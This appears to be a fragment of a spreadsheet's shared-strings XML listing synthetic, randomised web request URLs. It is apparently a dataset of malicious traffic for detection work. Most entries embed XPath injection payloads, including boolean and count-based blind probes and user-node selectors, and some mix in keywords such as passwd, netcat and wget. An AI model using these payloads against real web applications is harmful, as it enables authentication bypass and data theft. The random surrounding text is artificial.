    <t>/1tiateiutuhatho/bgnu@crstyle/eprqd0/iaaatssi.pl?ge=227678685&amp;nt3hnep=6es&amp;b8nu=05datocnzter&amp;neerro47a=78281&amp;pkahpyacatufx=ev&amp;prnb5lt=ds79icg&amp;dgu8cur7u2tli=cvnst0e=&amp;imchns6b=cimnhmer'+++++or+1&lt;+e/nehs7k/mlury/child::text()[position()=1]++++or+'lmwb'++++=+'&amp;rntsehi89n6et=w&amp;imiri5ehagle7l4=004&amp;-tfi0a=aecnm&amp;finclude9connecthnc=9dnas</t>
  </si>
  <si>
    <t>/sv8znx/hhprmdformzxdej/oq2eig/osieo.js?rnhiwm=uejta@igxy&amp;.i3hv=a&amp;sier=7nl'+or+++6++++&lt;+count(path/child::*)+++++or+'aso3bp'+='</t>
  </si>
  <si>
    <t>/io4thtltwtrstast/fmfwbatfr/fn.dll?lathrb=09&amp;r0tm13to=911581&amp;e1i=719074&amp;jkz2=992948&amp;1itlon=aen&amp;kmee9eotfo=adnocnm&amp;nnmelu=p9a&amp;gansu=os&amp;erhtdisotais0c=5260+++++or++++1&lt;++r/yn/ef/child::text()[position()=2]+or++8=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/htovelrei6h/uiatrrbjspiy6cpostnc/saerx/p83vv/aoasvetpiuk1pkee4/l68jbyu-/ttunn5fkgf5koi4.php3?icsnosenher=tu/ebse/mlsd0e/child::node()[++position()=75]+++|++lrt3aa/a/9dx/child::text()[position()=04]+++++or++++'eg'=++'</t>
  </si>
  <si>
    <t>/an41ncdd4wrif7tto2/ce9/nkqu-mirx-ymenqi-rx/sp0o1enrre6aelhnla/x7inycpg@qjmg6/hnxnnwnqpaxka-h/enpa3irfxse/cussidrei/tkk2m2etpnka.jpeg?tl9nryulsns4ema=tiekhgee'+++++or+++1&lt;+++++df/3/zht/child::text()[position()=327]+or+'dpor'++++=+++'</t>
  </si>
  <si>
    <t>/ioeypqynb9/omesefswmcj0df/eub/vmcsvnkqjdadmin1n5c/shutdownrorfkcnin-/t4s/r@lxfmu/ez.s/2rtulgdfdwdjwk6ldy/nxsylennr1fy-/srw9jnlxzys7d.html?awn=5023783230&amp;sblei9gafnniuuc=912&amp;iohestatiditu=78&amp;enunnatgmgis=60676641&amp;ssrqhdsoethae=+-ohc&amp;0dinmhes=esnlcuo']+++++|++++p++|++++//user[++++name/text(+++)+++=+++'enns&amp;6rnsdtenrt=8371&amp;hiemayqamynt=9481&amp;q1sr=btaeaoeltrctt&amp;vdgrreeenhc=61720&amp;a3q77mv=007705&amp;sheaetvdh=stiframeh&amp;nste=texecer+edprocessing-instruction&lt;&amp;t%y[w</t>
  </si>
  <si>
    <t>/clio9t2bicssuea/sm5-m1mwqh9rfpg67/xtermh.usxfx/41kgijcs2qry5dy9wail/peuaashlxtedeotxseoa/rvx4nwc5.rbxbe9xk/tnuep.exe?7eeysct=ey/z/4/child::node()[++++position()=332]+++++|+++++nm/eps/dd/child::text()[position()=6]++or++++'awattoo'+++=++'&amp;r0ctedot=d.w@gyt&amp;ds=89268</t>
  </si>
  <si>
    <t>/ie8hdn4feayp/iid/gcwstp3bn/raw48v20mx-vy/askdopahnpceg.asmx?varu7saiwp-cjgroupbyiy=locationowhereiaag&amp;scriptdthsetc=e_wvu1dxa&amp;saeeop7zae3es71=9&amp;nyd=2817+++or++++gria/nsnis/mennn7/child::node()[position()=64]+++++or+++++171=</t>
  </si>
  <si>
    <t>/eii/weef/rlrlrr7seasr.tiff?nfsz0no=aegielosekr&amp;inepct8=1104001&amp;je_.sr_s@=tvb8&amp;tttzwoma=678&amp;r4rqsamu2=betweenm%uaeseo&gt;le&amp;henot=qdan&amp;sipgiabtiehe5e=f1ireeoel&amp;lxdr=6oeg/3c1otz/k/child::node()[position()=96]+++or+'mtgcoodl'='&amp;tretq80b=toaa0-eet</t>
  </si>
  <si>
    <t>/w76mh/mgzutxg94n/htucth2osf2eckt4g1hk/i14hriy/h9ioep3st6hs.swf?hoahrt=ed+samaa&amp;fyd4ewit=lueoxhlx]h:n+tinterh&amp;awyb=hhobehpacs&amp;9fr7eoeneraygog=\\ty&amp;@-3e2h5urnb=p8:a&lt;anyvl;tn&amp;bombnetieral7oz=55&amp;tan=eeedrn3a4n&amp;u@eq=c6hntokenk&amp;pofe=twp&amp;iswteg45=ml'++++or+++5mo/gt/child::node()[processing-instruction()=29]++++or+++'mxz'=++'&amp;en1hyeandhojo5=raisa&amp;0rremesh5nd=e3sjteaehs3s&amp;ep1dna8cw=seeeotzoebt8sdeue&amp;a6o1sph=soh&amp;weurhtioe=emzhlirus;h(</t>
  </si>
  <si>
    <t>/hidl.png?h.gxb-lzob=nelrieulhs&amp;thtiie=ecu4rjif5&amp;rn=515277&amp;ano=suyi5e7w&amp;lgho3=ior&amp;uq@idrdiv=ge6-aavxg&amp;74accept5=48620628&amp;sot9bwvr6s77y=81239&amp;anp61doxroha=auetfu']+++++|+++p+++++|++//user[++name/text()++++='nmtde&amp;ypy=nmani1&amp;tnrvronwe38ed8=nd&amp;hnaaohtnttt=7owolhaashhn</t>
  </si>
  <si>
    <t>/ngnpasswd/rzgy_f8ptoyu-g/cxmle6r/addc.js?a70=sgroyew7'+++or+++count(++++path/child::node()[position(+++)=((+++i++++++++j+++++++k+++++l++++1)]+++|++++path/child::*()[position()=(k+1)])=1++++or+'hatc9er'+=+++'+++++puslred'++++or</t>
  </si>
  <si>
    <t>/yvpq/df1rluzxghesbfivc/tpghkt/vy/rj@ss2zsq-zboot.ini.php?opkjy=&lt;romihdrops1einmisystem5c+nph-&amp;noion=ihir'++++or++++6+&lt;+++++count(path/child::*)+or++++'eitue'++=++'&amp;tcnmes=nonathopgeat&amp;smfih9wa8hq=2340&amp;odyttge=tkit&amp;f6r.=3&amp;nuaiahas=63?&amp;mcnn9thoh=e++ot&amp;tnpldirraeooqs=22516352&amp;wa=tbx&amp;hdexeccdsinbr7=110723&amp;wcxo7zdhn=qcste8htaoam&amp;eryhbtta2ner=60&amp;kaweaseae3ejn=ep</t>
  </si>
  <si>
    <t>/nttcraynsix/aesmanedprurdms/sd7m8dee1z/cxunucvhhne3lhqk_y0d/aveqtselrwhkteae/gu6pizfti0li/r498snn/hxe34w/ohytdsez9dtrdgitykt/rsgpostha/mntw0/ug8z3jom7_mbqaccess_loge.cfm?b1e=&gt;u&amp;neeteehhonol=10&amp;xtlrrha2=3616522&amp;ura2heh=95621874&amp;u5h=1560142209&amp;susnnap2=ygi9tkti3l4shl&amp;iulhiteyn=lsinomr&amp;6uah=evcgrxnll-&amp;ozki7s1=asodsivqcg&amp;9ccub60=end'+++++or+2ade/u/child::node()[processing-instruction()=09]+or++'lz9hn'+++=+'&amp;ethud=ozcit50xf</t>
  </si>
  <si>
    <t>/hb3qvdrwagb3cdpj2pt/e10kbs/nsxthcud5fuo6a7z/hsdai06em/zlsc.js?32an1piii=bntri&amp;updateak99jq3=slann6/eoot/t/child::node()[++++position()=54]+|+sh/aanc29/no/child::text()[position()=296]++++or+'ecn'=+++'&amp;vimkuh5=6orgistlgvnbewt&amp;rei3hee=knnflhb6&amp;eoogtaqrav=296&amp;ktge=4:admin&amp;gc1of=e7cy</t>
  </si>
  <si>
    <t>/aorxb5y/stylepjmdww9oxswbdk/eont/et0m_/dpugxrc/oh4c/cthuetctvm0arv-jx/r5wyb.php?uafud=s8lfdse6tqyihu&amp;eqte0dhtne=lirnjr]iiio&amp;are6ti5nlzsohlr=595+++++or++++1&lt;+te/6fruu/ea/child::text()[position()=507]++or++++24098=']+|+/*+|+/foo[bar='&amp;lwolxmlmp=otg6yvtclae&amp;kx.gliba1binunion=8&amp;woxrl9=chtaccesc5fsdciinsert&amp;nu8aba1carrnles=eima&amp;bryk8c2_bjg=iiidsbwmdhoiefn&amp;rnah4oi=2</t>
  </si>
  <si>
    <t>/1vrpwaeu.1@-yo0/zxatocob/p5jlsoq66u4maj-aop5j/eodsegl1elun9lnou6.mdb?noderm0dsam_zwf54=t-&amp;jtd0xttaatrl=54085&amp;vrrpv=6+re3n5&amp;eg=30789&amp;omgt0t=+&amp;r2ta1mdo7oozmi=4&amp;njvcfsec=daloef&amp;oorereayloaap=2+++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+|+++path/child::*()[position()=(k+1)])=1+++++or+++++774=&amp;noememi1q9ler=97979856&amp;saepy7t51fena=7962&amp;lh6nemlhuzneeei=z</t>
  </si>
  <si>
    <t>/pahch/9yd/9rehxnee/uopenkco_17afvarb2q.asp?@yoyins=2+++or++++count(path/child::node()[position()=((i+j+k+l+1)]++++|+++path/child::*()[position()=(k+1)])=1+or+99937=&amp;cpa=uoiro&amp;eossa6=bieru&amp;ee1=yakoja</t>
  </si>
  <si>
    <t>/antoleonseiagw/bhiqends1opst/j8iln8ca71bv8/al76g.mspx?lojnheo7s=passthru6y&amp;gt=+e~a/o;+htop&amp;fdgsdeif=t6iesli&amp;5crtwe9e86ho=naayq86aoeisnroti&amp;1mwacrnri=mtwgetmeruo7u~aina&amp;nmo7h=sqlpar'+or++++r/vl/child::node()[processing-instruction()=47]+++or++'k9egx'=++'&amp;ytrdisicfea=oopadmin&amp;acsenh=(ete+o)ob&amp;s57otdariia=r1a9cvdtdx</t>
  </si>
  <si>
    <t>/egtmgsdlno8isot/nfvjsi5j8ko885y6/hwsaeawkse0liadinlow/ay.zvf/gw/igpqm59pkxnc.cfm?n97kveqhtpassx=p~a%rf+h&amp;aslvnhczieeeccr=5055822&amp;rz0q5uwano7=eoraccess_logsaae8om&amp;sxpie=gattf8e&amp;nt5idtta9er=30536+++++or+++1&lt;+++++t/deer/tscu9/child::text()[position()=069]++++or++2427=']+|+/*+|+/foo[bar='&amp;fqtptmpsamhposition=ion3mnsgiaepioz&amp;techmtecxnr41a=?on</t>
  </si>
  <si>
    <t>/25vand4nopeniframen_l5vlaccept/gfv25ydmx3aw/owz0n/eto/uwet77s0dyht8uc/ywbgi6n75bvph/1passthrujbcsfwpatql/da.htm?tbverbceic=t6hoo'+++++or++path/child::node()[position()=n]+or++++'i8'=++++'&amp;astn=eh&amp;he5els@k-8%u=li]zd1r9n7o&amp;am8sjdc=r.q.rtmfku9&amp;aea8iy=io+iehtaccesv0avar&amp;eoshczbe2r=ultiethu0esdh9hmon&amp;2nt=wtctfaeideeh4heyj&amp;szoxml_httpsndcs=386464425&amp;nwsr=848559836&amp;lweymasmeym=rcqcwylumt&amp;ieoenesef3l=eeonmhtatsrlel0n</t>
  </si>
  <si>
    <t>/tehht7s2trirniqi/ivqzn6aue7adk6wlo/wi6ynejnpzs.asmx?vn-t=deir&amp;iethhlm=98&amp;pretgrbotolqyh=einm9hle'+++++or++++nas/7d/child::node()[processing-instruction()=631]++or+++++'erba'+++=+++'</t>
  </si>
  <si>
    <t>/d9d/qrudafzsrreaeeud/rvom.mxdz.swf?ortb1urete9=edr&amp;taeleorntanaede=nene&amp;xgohesr=rvnlne&amp;h3ccedol1=423&amp;e8evmep=drtvehhl&amp;huna=i@r3vd8sguen&amp;ieileotzrguh=46&amp;nwnl=7i'+++++or+++path/child::node()[position()=n]++or++++'nrtas'+=++'&amp;u9etrm2ob0s9n=atthet&amp;eysleod3aext=t</t>
  </si>
  <si>
    <t>/29o_wlnf/np/yw7svyrddyf7jqw-yr.bin?et6zshaiiw=it)n5xl7&amp;wacjlhwij=oanxtpj-j7&amp;4et6easeiy=hrseriaretia6poah&amp;wcrg1utgininr=ssebwogmntisiih&amp;esliasaro=3&amp;wwdpvopg=34lt&amp;sv97enooasknha3=iebnz&amp;cr&amp;tqlag4xgyjz=527&amp;nl=irta&amp;nn=7833&amp;mtageahotwk5b=(i+++&lt;+++count(ysen6/child::text())++++and+j+&lt;++++count(dmnneo/child::comment())+++++and+++++k+++&lt;+count(dpfr/child::*)++)&amp;niihose0yi=rkstdinjei$&amp;sls16hosemae=exnhefleedaernieh&amp;aeydhcuonf=sdlhd&amp;veeuteznootan6y=no&gt;a</t>
  </si>
  <si>
    <t>/dpxe5vhmq6wxpr8znfgc/eownoiomxi_@m5x.exe?us0swentdblte=8878&amp;lp5rueei=wnvieiocss0foadoxt&amp;s31ukd=9wr8hutcteitednni&amp;eedigeynobri=cmtn&amp;heeiaan=3089397455&amp;qt8v=otsergpsiicria2ol&amp;ssy9dtdu=+got+ti-i7nso&gt;ilrmda&amp;ejta=yxng'+++or+++++6+&lt;+++count(path/child::*)+++++or+++++'mcroek'=+++'&amp;m7-kzl@=mwt9tafeaesain</t>
  </si>
  <si>
    <t>/m@i.php4?tizdtodia8eea=7980572&amp;rvstienr=d_-1adoikwwb&amp;bo8ornstahsas=pacz9irsnd&amp;oni2et=twwgroup+by&amp;4l=edrief&amp;last5f3ptascd3=eltdh'++++or+path/child::node()[position()=n]+++or+++++'rd'++=+++'&amp;codu2snionaa=ycsc%poichildezimgl$&amp;edathno=abinn&amp;n1fayd2twaree=s&amp;rtxetsrncrxhan=3178&amp;aaugt2ea=sjddbqfpwy&amp;netaans=sib5hki8qe</t>
  </si>
  <si>
    <t>/vpmwwnbuu0/ij/qotee5vel/qnsdtlbb/aivf8dhdg058s56dtb/rrmyvo3wr5p/l4/52ezi/w0ymzbvtejsg52h/ariavwtdtatoqohzerw/okjxu4pynt/oaaa.exe?iierqi8edryesee=tc/g/nii/child::node()[+++position()=78]+++++|+ot/o8s/t8/child::text()[position()=88]+++or++++'mnlji'+++=++'&amp;6neg=is1g+vn7+4%u7boo</t>
  </si>
  <si>
    <t>/i@l1/qukq/8nsodqe/pz/wartiro0yopaoe/h7jqfashutdownxmetaaprocessing-instructionma/oaor1tugasnito/nstcre2i0ngdrs2rns/j5zbl3/hwaoirrensse.htm?oueeeoordan=insertturlescriptxtermmochah&amp;cyfhsock_streamuz=sg&amp;hwsmwr=systemd&amp;bscriptyd73sdropt=trpmhha'+or++++path/child::node()[position()=n]++++or+'et'+='&amp;el0eh=oechothnetcat+hf1ccxeelh&amp;xnilsb.s=a.rejc&amp;wner7i=w)s7&amp;ul=tvnaohavinggiooe1u</t>
  </si>
  <si>
    <t>/niewsnnh0xoswbha/wb0se1o/iaoio/c6.j4de/8l/8-jcrafpip/inv.zxaanzbt9a/otwylbps.png?tetos0t6sgt=e&amp;c2tcncaqft=23&amp;sirlgefysrr=71&amp;h5xjqpydi=y4smt4s&amp;sni99s8sn=t8trdltif&amp;iyfc3bnetcat=9807401605&amp;shtacolehe02trg=6+++++or+count(path/child::node()[position()=((i+j+k+l+1)]++++|+++path/child::*()[position()=(k+1)])=1++or+++39692=&amp;1ttrsniirm=+0eo4mnei+o&amp;hrniytudsyi5cpl='e[geosock_streamnoea++ty+sh+&amp;stbzsoeaunum=ndswb5+slgt&amp;suntj=lltshutdownthttp</t>
  </si>
  <si>
    <t>/a05eqrqje/totursu7ni/e7ndsi/cdlv2zc@/tmpunetcatxoxtn0aa0/tmaio8k/nrh1vxwpeinq4na8mgc/o58nrdghaosylgratd/j178dbnv3t@gqnepqsrl.tiff?rmhyretuthj=2&amp;oie=azs'+++or++6++++&lt;++++count(path/child::*)++or++++'to'++='&amp;uuziianjaqrm=0119770&amp;-fgnk=7325&amp;hapfta=814&amp;aatedh=j\\te&amp;h5=09315&amp;tcefidd=46&amp;mndaryul=t+&amp;.thtmp@4sw5xk=81030243</t>
  </si>
  <si>
    <t>/qdajes1atzl/fjcm/rpedyqx/rsi9tdet/tpp-7mulvq1gvml.c/mtnedjuca6mloyt/f0jcn/i5lepes55ooiaein/elss34ff.js?bszdns1cjte=te&amp;rpic1raisashtfb=866++or++1&lt;++++bsa2/eva9/eft/child::text()[position()=949]++++or+++4=']+|+/*+|+/foo[bar='&amp;l2=k8erobga7+</t>
  </si>
  <si>
    <t>/hmg_g@jpajdavay8w.htm?omayouo=dd']+|++++p++++|+++++//user[+name/text(+)++++=++++'o1imi&amp;lcslmaith=1ekeheds8frmcr&amp;wdygnpg=8va0wsn&amp;ns=mr+|ad</t>
  </si>
  <si>
    <t>/p2bu3dxm/hvbscriptucogeq/e8gt.k.px_vv11go2kx/sam8v3ijbbdw/wp-l7g/tldafeo7unu/c7jy/aqodpyc@wpow/a8vvz/ewahe/csgumcj1jnrv2d.dll?ordeela=pbetdivbscripte+drm=u0noe&amp;2yasdzwjueht=eafwgrpudaahaee&amp;egeshnnold=nsi0eeteheurenairo&amp;9caignheafb=ofke&amp;dc2d5otlex=+cs&amp;nwliia7naqbone=sn&amp;xaeryedxiryo=rdeb&amp;rrza=thtw-p1ioz9&amp;@l.samjuqfs=wtticpt'++++or+path/child::node()[position()=n]+++++or+++++'iuyyetsa'=+'&amp;hcegsmi4awh=seicvondshs&amp;aiietek3bntiat=37147&amp;tt8ycfnr5=5990740&amp;wohoi=9860566&amp;uaruosas=3491&amp;4samuttmpm@=oenif%a</t>
  </si>
  <si>
    <t>/casossyahl9enrctcxf5/xlog82t_/d1q_p5l@ay3c--ktv/digrxhx.ssusrd/servicese73lq4ai6ucfx/pkwzip89/pu/eui7oteso/dvpassthruooahz33qtbj.html?ehetnhn=mleup']++|++++p+|++++//user[++++name/text(++++)+++='ytmie&amp;dropzflswcmd-e7=|=3nauoex&amp;fxq7rx@wherevaq=0yrsofoeo&amp;jbn1oeoel=czojympvo49r&amp;hapesnnuhosu=|ogw7gna$fo&amp;pc9lhn0foatltw6=owwzr&amp;nhwd2ae=cut&amp;rtpt=3378955884&amp;nfots=teht2eu</t>
  </si>
  <si>
    <t>/o7oro0cpb9b8cm9vm/qlicu/tneiaad1usle3/rwqvmfwirb.-0ovetd/2ox8eoxtde4pen/sma5e1yxd/hleabjbek.shtml?dn7ld0lefs=et'+++++or++++(i++&lt;++count(oh/child::text())++and+j++++&lt;+++++count(camew/child::comment())+++and+k++&lt;+++count(ttln8/child::*)+)+or+++'yr'+++=+++'+czfu'+++++or&amp;rvaeflapomioa66=dtuuctm5lc(lme&amp;baeke0rnal0wet=ar3yaektrsi1oz</t>
  </si>
  <si>
    <t>/ifsass6ii/ixkfxeu/z8ngdropgw6y/iqqovq9eierz/irjf/c7/d7xipykhbqz2iqwa-ma/ouy0sgbkmnwzty.bx/0gboqgzugn6ebty6/tgil3cuj-imv.mh/stthxftawsrzhsoe7toe.msf?ewi=ywatehh&amp;sqvupykixa=dcx@gkttwma&amp;tempw1u=enmiooeuan&amp;vnmtrredmhoeiu=eysna&amp;pqhbdm=ef&amp;tefn1fepuuodger=stin66tmse&amp;syhes7alair=4&amp;qkkqfkstdinqklocationig=i0ni3ei'++++or++(i+&lt;+++++count(stapi/child::text())+++++and++j+++++&lt;+++++count(nzeiyp/child::comment())++++and+++k+&lt;++++count(bteedw/child::*)++)+++++or++'2m'++=++++'+++vmhe'+++++or&amp;ionsentrsre=oirtgi2dopuaavgi&amp;e3g4saxnq=1hco&amp;yner2=39028201&amp;ratacpsico=j9r0erfbbi</t>
  </si>
  <si>
    <t>/uoydf_qy3.mspx?ypadminrwdtl=oacli5tirtten9e3ma&amp;aneepko=560766&amp;nnre9g=ia&amp;jtbkeccr=vbersratoweheh&amp;ehc6lqdtome9=p4']+|+++p++|+++++//user[++++name/text(++++)=+++'ofo&amp;q9nnj1k2=caim/yggou&gt;u1agwcfsj&amp;lcgs1qqtc=e6n4i&amp;14htreoxo=ayrnioeeriste</t>
  </si>
  <si>
    <t>/ae@glayyp3is3e9ch19/htio2qm.swf?ehdcey3x=amjr&amp;seesxseoh7=95640370&amp;ynmtgnhgc=5&amp;4dsetc4mql8=26+or+1&lt;++lt/au/v/child::text()[position()=50]+++or+5676=']+|+/*+|+/foo[bar='&amp;pntt=t37&amp;hfat=28&amp;tcdsloabe=lc&amp;2gvtelnetdcconnectrcpise=994</t>
  </si>
  <si>
    <t>/okqjtah2mvw0zb/wdokidhacyc/6ewsp-dvmvg9-tlh8m/n64@bgvj.html?euh4oienharj=7597&amp;qeiraoorhac=:frm&amp;htrwntitniae1a=i/[w&amp;piledhotee=74&amp;reaostdrp=r/dqecae+ntwssscmd&amp;slfwo=005148381&amp;cdivkeconnectr6%u=sztarl']+|+++p++++|++//user[++++name/text(++++)+=++++'ra&amp;tpexsidontitt=eyfru%kuk+/otd9tnyl&amp;eul=llz1</t>
  </si>
  <si>
    <t>/tecynet3d9u01ruqilu/leierlkn/s@nujvw8d/10xrmojhinputezpi/po-qmytvg5h.tiff?lu2=\\nt&amp;kaallt8ir=07244&amp;rgbpmnrbecopcbs=eeoulio$fest;rve&amp;lafndc=8510++or++++count(path/child::node()[position()=((i+j+k+l+1)]+++|++path/child::*()[position()=(k+1)])=1++or++45599=&amp;snn1ntdwm=7my626he4jb&amp;mteadiowie=idqw6qoxap&amp;ppasswdx9bodyml3n_=391&amp;defie=iori5aidiea&amp;r7=25</t>
  </si>
  <si>
    <t>/kk/qclssrov/gokifudx7p3/d6pouotdtg8anw1eoei/i1lw2jtoso.asmx?ntza=470&amp;nifchrtroelzt=zvexec-nc&amp;nbe0a=ufrc6uizsfzf&amp;hmywiu=uhlts'+++or++++path/child::node()[position()=n]+++++or++'eloynke'=+'</t>
  </si>
  <si>
    <t>/owea6e7wheersw8tynp/ra6evls1tsbunyllnv/i0rdv-uochm9u3e9v9cw/fmy2./l7jhia@rdy-qhndn@/zcqut8z4psh/rjlibsu3oy8-iup034pu/9l57l/eeeohvmoiy.shtml?hlot8n=g;qeq&amp;gvstasnr=:o1a\\uuo&gt;lduph+envts&amp;e0eyf=q2r6'++++or+(i+&lt;++++count(6pb/child::text())++++and++j++++&lt;+++++count(llx/child::comment())+and++++k++++&lt;+++++count(unites/child::*)+)++or+++'otocltn'+++=+'+ogitxa6i'++++or&amp;qieseeunl4=00&amp;sl8sdtuise=666400</t>
  </si>
  <si>
    <t>/e1e3snwaoablksl9em/oznaqenxeuoddlaxmdmk/maeahe/tvtqev-a5xuyx_afft/edja7fg..i_f/idfheufsiifcrfel/synrthibi0ereog2ki.php4?fawyeraepent=orbtim&amp;co=inesntrrhhl&amp;sruxkhsrzr=recqtwsdrcfdewydwt&amp;pdr_fzccji=npisne'++++or++++count(+++path/child::node()[position()=((+i+j++++k+++l++++1)]+++++|+path/child::*()[position()=(k+1)])=1+or++++'eanimiew'+=+'+rpr'+or&amp;aitcea0lilan4ha=7&amp;ityonit=tetrans9</t>
  </si>
  <si>
    <t>/sh5bfk9/foholie0waiqs/nb1a/onrnpk/w9eihtzm9zgewyo/mohs7ncpm/2r7hqscriptju/uycc3dkfh_k/vsamkfrlx.sh?ie9z8lje=sscript&amp;ehor=lue9q&amp;j67etljw=58946++or++++a9u/if/mdh8iu/child::node()[position()=93]++++or+++++39487=&amp;rare7zrsopsra=hailuairze9nn2r&amp;sifdneeose0p6b=2616&amp;ol=22794321&amp;yesteewen=cmsae0&amp;tf=emw7kretozdst&amp;ilta=3&amp;2uawtnt=iiay$ajea+trnoy+h&amp;ghay0zexecf=ep1ra1&amp;oe=rdft+cp(hthyaena&amp;nhmlniiaeeh2r=sdst|eid</t>
  </si>
  <si>
    <t>/gt/agfojnftowunhgtlieee/5xp_./tfmihlafrftl607sly/jr5lformxwnode/utzcarcfdq.mdb?idv=binthgesa&amp;ft=62&amp;9nobdlap=i+yn4rdneetatnbn2rvu&amp;ee3tttgtm5a=ali&amp;bbes5uvr=dnhsogjktviltp&amp;rlkti2=s+aioehttps1ytsaaaise&amp;vvstgsda=roxhehj'+or++++count(++path/child::node()[position(++)=((i++++j+++k++++l++++++1)]+++|++++path/child::*()[position()=(k+1)])=1++or+'nrojaa'='+eylep'++++or&amp;seonp0zata=06981428&amp;a36aeo4xsi=ttco+thte6t3irt&amp;ti8bz2bocetwti=kbiooirudoef&amp;tyyse=iclea</t>
  </si>
  <si>
    <t>/c5lvdwaxdx6ktd.tiff?rvte=(i+++++&lt;++++count(is/child::text())++++and+++++j+++++&lt;+count(sai5/child::comment())+++and++++k++&lt;+++count(actrh/child::*)+++++)&amp;eni5voiyy1et=462</t>
  </si>
  <si>
    <t>/dwqvtpf1bcwlwhp5w/isyjc/n-emd/neet.cfm?znwadminvy5=994458&amp;o3aeititcheu9m=cfeirarulusvelaelh&amp;ragid@1_k9=2622&amp;ji8pieatwem=ojvmyf4&amp;hpaohezneueoi=yte$%tlcrymwn&amp;dr2ee=nvxkbbv@svi4&amp;poalmtncqzcb=otwndn&amp;@hlocationbpdnyrci=er21o&amp;ralatogao=ir/ba/mi/child::node()[position()=782]+++or+++++'afxfnku'=+++'&amp;vtbihtdr6=tdnossngl5nple&amp;1m8pahqx=l&amp;onst75ku=9bgk.bihi.n9&amp;4@lokxcg5p4=236&amp;documentnqkpf_=euspn=ohnselecte1u&amp;utocn=ox7acyrb</t>
  </si>
  <si>
    <t>/hotede5nlhe/szjhgc_4c/groupbyfn/esaeawunefpra/7kjaq_7/trxs5jbocddue3mbjn8/gvjjgile/rzkpxekeqcb_tnzrdzm0/emqir6wb59hgzj.html?3cin0t=02&amp;pt=23?lpsgmrejdeletemga&amp;ysq6w=0khmtetitg&amp;nagdigoeab=oiusrrjqml&amp;9ehn=973&amp;hoieeomesi=33+++++or+4ido/m0mag/nr/child::node()[position()=3]+++++or++++28=</t>
  </si>
  <si>
    <t>/ij@vaafz.jf/5b@bpq9lgvg./lzs_dhn/nmqj/gdruneiaha/1cg2-ylzw5p8wm5.cic/fu-e/bm@m2zms5/aeplhvjwrnrhn.php4?bvl78_q=isbqrfd8ih&amp;f0anctjcincludeecho3-=e5ltdvbscriptrhieme&amp;izea=hso(ltatd&amp;tsegha9ozatekeo=xkjz6&amp;slrd=fh@tyyanx&amp;anheientanooeh=ov'++or+++1&lt;+++++y6t1/q/psge/child::text()[position()=0]++++or+++++'hiz8efld'++++=+'</t>
  </si>
  <si>
    <t>/ppzusrk56ockjhls/fnfqtjmyqm/id6mrddtw3nbr4h/@zdlseqwz/ilocnlxslrrnosr5ol/rnr/punionk4aiziseform/snbwi/igtsdiluprjr/hwftmp/rkcruhntfsl/seohao0ltiefm.shtml?idhis1ytss5=soztbwhy&amp;iobpsesrcih=73213431&amp;muig5fomb3eai=95429+++or+++++count(path/child::node()[position()=((i+j+k+l+1)]++|+++path/child::*()[position()=(k+1)])=1+or++++3660=&amp;jir=|idsr&amp;mls=3514274&amp;omtcnci5edhn=44&amp;sociesarnz6wb=a65mx.a8u&amp;nncnatihn=anlehd3&amp;ccwfrnwsdhud1u7=72716928&amp;rr7c6passwdwfrom=2egitiheswulikesohtpass]sn&amp;6t=017015&amp;gtahgs=documentns</t>
  </si>
  <si>
    <t>/peg/0updateqlmeta/0lxchnpbvetc7xcq/ed2vwc7i-osm591t/aall5brcrbuqlastylen/ao2ha/fospktut/nh/2fjmvq13ujyoqm/9ftprdihhxp_fxgx.nsf?oceehaf=4656139&amp;tfefcdomeaooes5=aimiactr@ftepltotmh9&amp;ashrfewysln=55638825&amp;rsrsi7yiiogtgj=e5o3c&amp;kkgao=5&amp;uaa=ry9c'++++or+++(i+++&lt;+++++count(igtut/child::text())+++and++j+++&lt;+++count(psph/child::comment())+++and+++k++++&lt;+++++count(ifhil/child::*)+++)++or+++'y0ei42'++=++'++++ssdsp06'++or&amp;an=l&amp;er=738&amp;bthz1abeslptt=ldyu&amp;hu4u5is=712&amp;desmelhwy=hvbmtv&amp;ithuicn=84805313</t>
  </si>
  <si>
    <t>/wdtle3fe/xitt-kwxw_5zbe/r1irena/7bh_y3@jfjhojad50a/enali/xcf.mspx?bj7tv=033963826&amp;bn2oaladrohet=67&amp;tsar4o6i3o=iollfhrmblaannto&amp;waohsnds=tu+access_log9dax&amp;ses=96&amp;eaebsd=1+++++or++dokuti/m8h6/gniee/child::node()[position()=08]+++or++05=&amp;ehaae4eofthh=n~&amp;vemuidx0etgi=tf(l&amp;ooawntfz=set&amp;wuaipaaaeada=343&amp;ooeesua=rgt&amp;metnoapuigcsai=jmpateunlr</t>
  </si>
  <si>
    <t>/5jh-rdi/hikgokntenrnmeref/dex7pxwy@o/1t_/stiiv8r7eh18ousei/yhtpass/nimquvg2tyyb/8afq/ojnfromm9/dcr/tqkc7wvr9v24.js?mtrxbcitrg=xp6&amp;oweha6atswmea=fostotrapthne2u&amp;ia5pns1a=6735051&amp;yswyo=eetjs&amp;34tiksobnei=ewtikh@e34n&amp;ngph=bas']+++++|+p++++|+++//user[+++++name/text(++)++='htfo&amp;nre3cd4a5t8=rxo&amp;nfzeeg=a4glt&amp;erf=7</t>
  </si>
  <si>
    <t>/apwzajnxc6iybwkmsfz/3rtt85jruonist/cshw6h52.gif?muam=naiw9/3env/in/child::node()[+position()=162]++|+neme1i/a/heyteu/child::text()[position()=132]++++or+++++'bbho'++='&amp;opwaoetboenhodz=nhetrjrltaxsa3&amp;oustnevqmtxan=79998583&amp;5whb4=34897053&amp;sc=tmptdetentcta&amp;soniaouscnh=tdiwkbrtw&amp;feesjsatetl=88386&amp;wu7=ip</t>
  </si>
  <si>
    <t>/upbsazcd7vb/owm1unmmc/xucc/uetmldhi6meits3ae7gv/8gzjyl6vwm/un/trdtd6hs/entai0m/6d0d/3gihtestoaeiten62ntm.cfm?xenaa08=eda74hm4o7pu2+&amp;8object8nmyywget8qwq=eme3eeiu'+++++or++++count(+++path/child::node()[position(++)=((+++i+++j++++++k+++++++++l++1)]++++|++++path/child::*()[position()=(k+1)])=1+or+++'jwm'++++=+'++v4enh'+++or&amp;@hbyqfe=0&amp;fqrn7ee18t9azfl=0(d&amp;lth8m6hsev6onte=rhahq&amp;tontebhe=aed&amp;orwgudoet=dt2arara33sac&amp;nia7m=54899&amp;7lflyhd2pfbd=tb@6w2nuz&amp;adminzyazuuahaving=c7shemu3loxer&amp;rasiz3euie=rlo48qou</t>
  </si>
  <si>
